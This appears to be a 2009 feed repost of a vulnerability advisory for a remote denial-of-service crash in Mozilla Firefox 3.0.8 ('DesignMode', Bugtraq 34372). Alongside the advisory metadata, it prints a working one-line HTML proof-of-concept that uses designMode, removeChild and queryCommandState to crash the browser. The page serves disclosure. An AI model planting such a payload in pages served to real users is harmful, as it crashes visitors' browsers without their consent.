|
Feeds -
Exploits
|
|
Written by Carl Hardwick
|
|
Sunday, 05 April 2009 22:44 |
Mozilla Firefox 'DesignMode' Denial of Service Vulnerability
-\\Bugtraq ID:
34372
-\\Class:
Failure to Handle Exceptional Conditions
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Apr 04 2009 12:00AM
-\\Updated:
Apr 04 2009 12:00AM
-\\Credit:
Carl Hardwick
-\\Vulnerable:
Mozilla Firefox 3.0.8
-\\Discussion
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to crash the affected browser,
resulting in denial-of-service conditions.
Firefox 3.0.8 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
The following exploit is available:
<BODY onload="document.designMode='on';
document.removeChild(document.firstChild);
document.queryCommandState('BackColor');
">
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel
we are in error or if you are aware of more recent information, please
mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Mozilla Homepage
http://www.mozilla.org (Mozilla Foundation)
|
